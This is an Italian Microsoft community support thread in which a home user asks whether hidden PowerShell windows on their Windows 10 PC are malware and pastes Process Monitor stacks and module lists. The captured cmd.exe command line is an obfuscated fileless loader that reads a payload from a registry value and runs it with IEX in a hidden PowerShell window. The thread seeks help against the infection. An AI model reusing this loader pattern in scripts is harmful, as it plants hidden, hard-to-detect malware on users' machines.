ciao PAOLO GUALDI
Mi puzza di bruciato.
Punti 1, 2, 2a, 3 di questo tutorial:
POWERSHELL SI AVVIA DA SOLO
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(128, 8%, 22%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EA%3C/text%3E%3C/svg%3E)
Anonimo
POWERSHELL parte improvvisamente da solo ed apre diverse finestre non in vista, tramite procmon64 ho ricavato questi dati:
EVENT
0 ntoskrnl.exe ObReferenceObjectByHandle + 0x1ece 0xfffff8033cf2cc7e C:\Windows\system32\ntoskrnl.exe
1 ntoskrnl.exe SeQueryInformationToken + 0x288f 0xfffff8033cf4d72f C:\Windows\system32\ntoskrnl.exe
2 ntoskrnl.exe ObWaitForMultipleObjects + 0x11f1 0xfffff8033cf2a161 C:\Windows\system32\ntoskrnl.exe
3 ntoskrnl.exe ObOpenObjectByNameEx + 0x1dd 0xfffff8033cf3fe3d C:\Windows\system32\ntoskrnl.exe
4 ntoskrnl.exe NtQuerySystemInformation + 0x3a4d 0xfffff8033cf3fb1d C:\Windows\system32\ntoskrnl.exe
5 ntoskrnl.exe FsRtlFreeExtraCreateParameter + 0x3af 0xfffff8033cf3c06f C:\Windows\system32\ntoskrnl.exe
6 ntoskrnl.exe setjmpex + 0x8933 0xfffff8033cbe2683 C:\Windows\system32\ntoskrnl.exe
7 ntdll.dll ZwOpenKeyEx + 0x14 0x7fff167282b4 C:\Windows\SYSTEM32\ntdll.dll
8 KERNELBASE.dll MapPredefinedHandleInternal + 0xabc 0x7fff133b2c6c C:\Windows\System32\KERNELBASE.dll
9 KERNELBASE.dll RegOpenKeyExInternalW + 0x13b 0x7fff133b1ddb C:\Windows\System32\KERNELBASE.dll
10 KERNELBASE.dll RegOpenKeyExW + 0x19 0x7fff133b1c89 C:\Windows\System32\KERNELBASE.dll
11 profapi.dll profapi.dll + 0x303d 0x7fff12af303d C:\Windows\System32\profapi.dll
12 profapi.dll profapi.dll + 0x2ad0 0x7fff12af2ad0 C:\Windows\System32\profapi.dll
13 profapi.dll profapi.dll + 0x1a2f 0x7fff12af1a2f C:\Windows\System32\profapi.dll
14 UBPM.dll UbpmTriggerConsumerRegister + 0x53e5 0x7fff0fec9b85 c:\windows\system32\UBPM.dll
15 UBPM.dll UbpmTriggerConsumerRegister + 0x9904 0x7fff0fece0a4 c:\windows\system32\UBPM.dll
16 UBPM.dll UbpmTriggerConsumerRegister + 0x6ffc 0x7fff0fecb79c c:\windows\system32\UBPM.dll
17 UBPM.dll UbpmTriggerConsumerRegister + 0x75c5 0x7fff0fecbd65 c:\windows\system32\UBPM.dll
18 UBPM.dll UbpmTriggerConsumerRegister + 0x7ec5 0x7fff0fecc665 c:\windows\system32\UBPM.dll
19 UBPM.dll UbpmTriggerConsumerRegister + 0x8835 0x7fff0feccfd5 c:\windows\system32\UBPM.dll
20 UBPM.dll UbpmTriggerConsumerRegister + 0x82d4 0x7fff0fecca74 c:\windows\system32\UBPM.dll
21 UBPM.dll UbpmTriggerConsumerSetDisabledForUser + 0x502 0x7fff0fed3652 c:\windows\system32\UBPM.dll
22 EventAggregation.dll EACreateAggregateEvent + 0x1bce 0x7fff129a3fae c:\windows\system32\EventAggregation.dll
23 EventAggregation.dll EACreateAggregateEvent + 0x1ac1 0x7fff129a3ea1 c:\windows\system32\EventAggregation.dll
24 EventAggregation.dll EACreateAggregateEvent + 0x12e9 0x7fff129a36c9 c:\windows\system32\EventAggregation.dll
25 EventAggregation.dll EACreateAggregateEvent + 0xf4f 0x7fff129a332f c:\windows\system32\EventAggregation.dll
26 EventAggregation.dll EACreateAggregateEvent + 0xa48 0x7fff129a2e28 c:\windows\system32\EventAggregation.dll
27 ntdll.dll TpWaitForWait + 0x805 0x7fff166d3495 C:\Windows\SYSTEM32\ntdll.dll
28 ntdll.dll TpWaitForWait + 0x50d 0x7fff166d319d C:\Windows\SYSTEM32\ntdll.dll
29 ntdll.dll TpWaitForWait + 0x370 0x7fff166d3000 C:\Windows\SYSTEM32\ntdll.dll
30 ntdll.dll TpSetWait + 0x190 0x7fff166cf410 C:\Windows\SYSTEM32\ntdll.dll
31 ntdll.dll RtlReleaseSRWLockExclusive + 0x1c93 0x7fff166b3703 C:\Windows\SYSTEM32\ntdll.dll
32 KERNEL32.DLL BaseThreadInitThunk + 0x14 0x7fff147b8364 C:\Windows\System32\KERNEL32.DLL
33 ntdll.dll RtlUserThreadStart + 0x21 0x7fff166e7091 C:\Windows\SYSTEM32\ntdll.dll
PROCESS
Description: Processore dei comandi di Windows
Company: Microsoft Corporation
Name: cmd.exe
Version: 10.0.14393.0 (rs1_release.160715-1616)
Path: C:\Windows\system32\cmd.exe
Command Line: cmd.exe /c Echo IEX "icM ([SCRiPTBLOck]::CrEAtE([stRING]::JOin('', ((gET-ITEmPRopErty -pATh 'hKLM:\SOFtWArE\pIRiForMlwZ7L').'Lwz7l6w' | % { chAR }))))" | POwERshElL -wINdowstyle hidDeN
PID: 8336
Parent PID: 1124
Session ID: 1
User: PAOLO
Auth ID: 00000000:0002260f
Architecture: 64-bit
Virtualized: False
Integrity: Etichetta obbligatoria\Livello obbligatorio alto
Started: 30/08/2022 10:59:46
Ended: (Running)
Modules:
cmd.exe 0x7ff7b4780000 0x59000 C:\Windows\System32\cmd.exe Microsoft Corporation 10.0.14393.0 (rs1_release.160715-1616) 16/07/2016 04:23:21
KernelBase.dll 0x7fff13390000 0x21d000 C:\Windows\System32\KernelBase.dll Microsoft Corporation 10.0.14393.2097 (rs1_release_1.180212-1105) 30/03/2018 05:22:08
msvcrt.dll 0x7fff14520000 0x9e000 C:\Windows\System32\msvcrt.dll Microsoft Corporation 7.0.14393.0 (rs1_release.160715-1616) 16/07/2016 04:26:15
kernel32.dll 0x7fff147b0000 0xac000 C:\Windows\System32\kernel32.dll Microsoft Corporation 10.0.14393.2097 (rs1_release_1.180212-1105) 30/03/2018 05:32:56
ntdll.dll 0x7fff16680000 0x1d2000 C:\Windows\System32\ntdll.dll Microsoft Corporation 10.0.14393.1715 (rs1_release_inmarket.170906-1810) 07/09/2017 06:51:10
STACK
0 FLTMGR.SYS FltDecodeParameters + 0x195a 0xfffff805c1a646ca C:\Windows\System32\drivers\FLTMGR.SYS
1 FLTMGR.SYS FltDecodeParameters + 0x1508 0xfffff805c1a64278 C:\Windows\System32\drivers\FLTMGR.SYS
2 FLTMGR.SYS FltDecodeParameters + 0x616 0xfffff805c1a63386 C:\Windows\System32\drivers\FLTMGR.SYS
3 FLTMGR.SYS FltDecodeParameters + 0x3be 0xfffff805c1a6312e C:\Windows\System32\drivers\FLTMGR.SYS
4 ntoskrnl.exe NtQueryInformationFile + 0xc20 0xfffff8033cf563a0 C:\Windows\system32\ntoskrnl.exe
5 ntoskrnl.exe NtQueryDirectoryFile + 0xcf 0xfffff8033cf581df C:\Windows\system32\ntoskrnl.exe
6 ntoskrnl.exe setjmpex + 0x8933 0xfffff8033cbe2683 C:\Windows\system32\ntoskrnl.exe
7 ntdll.dll ZwQueryDirectoryFile + 0x14 0x7fff16726744 C:\Windows\System32\ntdll.dll
8 KernelBase.dll FindFirstFileExW + 0x40c 0x7fff133b86fc C:\Windows\System32\KernelBase.dll
9 cmd.exe cmd.exe + 0x599a 0x7ff7b478599a C:\Windows\System32\cmd.exe
10 cmd.exe cmd.exe + 0x76e8 0x7ff7b47876e8 C:\Windows\System32\cmd.exe
11 cmd.exe cmd.exe + 0xd9ad 0x7ff7b478d9ad C:\Windows\System32\cmd.exe
12 cmd.exe cmd.exe + 0xc3cd 0x7ff7b478c3cd C:\Windows\System32\cmd.exe
13 cmd.exe cmd.exe + 0x4917 0x7ff7b4784917 C:\Windows\System32\cmd.exe
14 cmd.exe cmd.exe + 0xc378 0x7ff7b478c378 C:\Windows\System32\cmd.exe
15 cmd.exe cmd.exe + 0xf916 0x7ff7b478f916 C:\Windows\System32\cmd.exe
16 cmd.exe cmd.exe + 0x1510d 0x7ff7b479510d C:\Windows\System32\cmd.exe
17 kernel32.dll BaseThreadInitThunk + 0x14 0x7fff147b8364 C:\Windows\System32\kernel32.dll
18 ntdll.dll RtlUserThreadStart + 0x21 0x7fff166e7091 C:\Windows\System32\ntdll.dll
per chiudere i 5/6 processi cmd.exe che restano aperti fintanto che non li chiudo uno ad uno tramite gestione attività
vorrei sapere che succede, se si tratta di un processo normale che posso lasciare attivo, se faccio bene a chiuderli oppure se è uno dei nuovi"virus" tipo ASTAROTH o simili non identificabili dai comuni antivirus.
premetto che non sono un mago del pc ma un dilettante.
grazie per l'interesse
Windows per utenti privati | Windows 10 | Prestazioni ed errori di sistema
Domanda bloccata. Questa domanda è stata eseguita dalla community del supporto tecnico Microsoft. È possibile votare se è utile, ma non è possibile aggiungere commenti o risposte o seguire la domanda.
2 risposte
Ordina per: Più utili
-
Anonimo
2022-08-30T10:27:58+00:00 Ciao PAOLO GUALDI
Stai usando CCleaner?
Buona giornata!